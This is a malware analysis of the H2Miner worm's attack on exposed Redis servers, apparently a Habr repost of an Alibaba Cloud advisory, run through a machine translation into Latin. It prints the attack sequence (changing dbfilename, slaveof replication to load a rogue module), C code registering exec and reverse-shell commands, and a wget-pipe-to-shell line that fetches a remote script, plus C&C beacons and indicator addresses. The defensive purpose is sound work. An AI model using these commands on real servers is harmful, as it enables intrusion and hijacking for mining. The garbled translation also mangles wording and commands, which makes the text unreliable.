Novus tumultus vermium H2Miner res gestas Redis RCE deprehensus est

Pridie, unus ministrorum meorum projectus simili vermiculo oppugnatus est. Quaerens responsum quaestioni "quid est illud?" Magnum articulum inveni in Alibaba Cloud Securitatis quadrigis. Cum hunc articulum in Habré non inveni, maxime tibi illud interpretari decrevi <3

ostium

Nuper Alibaba turma securitatis Cloud subitum tumultus H2Miner detexit. Hoc genus vermiculi malitiosi defectus licentiae vel infirmae passwords utitur pro Redis portae ad systemata tua, post quod suum modulum malitiosum cum servo per synchronizationem dominicum synchronisationi conformat, ac tandem infaustum hunc modulum ad machinam oppugnatam et malitiosos exsequitur. mandatis.

In praeterito, impetus in systemata tua principaliter exercebantur utentes methodo quae ad operas accedant vel SSH claves, quae machinae tuae scriptae sunt post initium oppugnatoris in Redis. Fortunate, haec methodus saepe adhiberi non potest ob problemata cum licentia dominii vel ob varias versiones systematis. Sed haec methodus maligni moduli levandi mandata oppugnatoris directe exequi potest vel ad concham accedere, quod rationi tuae periculosum est.

Ob multitudinem Redis ministrantium in Interreti (fere 1 decies centena millia), Alibaba turma securitatis nubis, ut amica admonitio, suadet ut utentes Redis online participes non habeant et regulariter vires eorum passwords coerceant et an decipiantur. velox lectio.

H2Miner

H2Miner botnet fodienda est pro Linux-substructio systemata quae systema tuum in variis modis invadere potest, incluso defectus auctoritatis in Hadoop tincto, Docker, et Redis passibilitatem mandati remotam (RCE) vulnerabilitatem. Botnet opera scripta maligna et malware in notitias tuas deprimendo, impetum horizontaliter expand, ac mandatum ac potestatem (C&C) communicationum obtine.

Redis RCE

Scientia de hac re communicata erat a Pavel Toporkov in ZeroNights 2018. Post versionem 4.0, Redis obturaculum in pluma loading sustinet quod utentibus facultatem dat onerandi tam limam cum C in Redis confectam ad certa Redis mandata exequenda. Hoc munus, quamvis utile, vulnerabilitatem continet in qua, in modo servili, fasciculi cum servo per modum fullresync modo conformari possunt. Hoc adhiberi potest ab invasore ad maliciam tam limam transferendam. Postquam translatione peracta est, oppugnatores modulum in Redis aggressi onerant instantia et mandatum aliquod exequuntur.

Malware Worm Analysis

Nuper in Alibaba Cloud turma securitatis reperta est magnitudinem globi H2Miner malitiosi fodinarum subito dramatically crevisse. Secundum analysin, generalis processus impugnationis talis est:

H2Miner RCE Redis utitur ad impetum pugnae plenae. Impugnatores primum impetum Redis nudos servientes vel servientes infirmae passwords sunt.

Tum uti mandatum config set dbfilename red2.so tabella nomen mutare. Post hoc exsequuntur hostes slaveof ut dominus-servus replicationem hospitii electronicam poneret.

Cum Redis oppugnatus instantia constituat dominum servum nexum cum malitiosis Redis ab oppugnatore possessis, oppugnator infecti moduli usus mittit mandatum fullresync cum lima synchronum esse. Scapus red2.so postea in machinam oppugnatam demittetur. Tunc oppugnatores utuntur ./red2.so modulo onerantium ad hanc tam limam oneratam. Modulus mandata exequi potest ab oppugnatore vel nexum reversum inchoare ut aditus ad machinam oppugnatam accedat.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Post praeceptum malitiosum ut / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1oppugnator nomen lima tergum reset et moduli rationem explicabit ut vestigia emundant. Sed fasciculus red2.so in machina oppugnata adhuc remanebit. Usores monent ut tabellam tam suspectam praesentiae suae in folder instantiae Redis attentent.

Praeter processus malitiosos ad interficiendos facultates furandi, invasor scriptionem malitiosam secutus est, ut binarii limas malitiosae exsequerentur et exsequerentur. 142.44.191.122/kinsing. Hoc significat processum nomen vel nomen directorium continens propinquitatem hospitii indicari potest machina illa hoc virus infectam esse.

Secundum ipsum eventum contrarium, malware principaliter functiones quae sequuntur exercet;

• Discas files et exsequentem eos
• Mining
• Sustineat C & C communicatio et exequens invasoris mandata

Masscan utere ad externam inspectionem ad auctoritatem tuam augendam. Praeterea inscriptio IP servientis C&C in programmate dura-codedetur, et exercitus oppugnatus communicabit cum servo communicationis C&C utens petitiones HTTP, ubi notitia zombie (commissorum servo) in capite HTTP notatur.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Alii modi impetus

Inscriptiones et nexus usus est in vermibus

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c*

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Concilium

Primum, Redis ne accessibilis e Interrete sit et tessera forti muniri debet. Gravis etiam est clientes reprehendo nullam esse red2.so lima in Redis directorio et nullum esse "propinquum" in tabella/processus nomen in hospitio.

Source: www.habr.com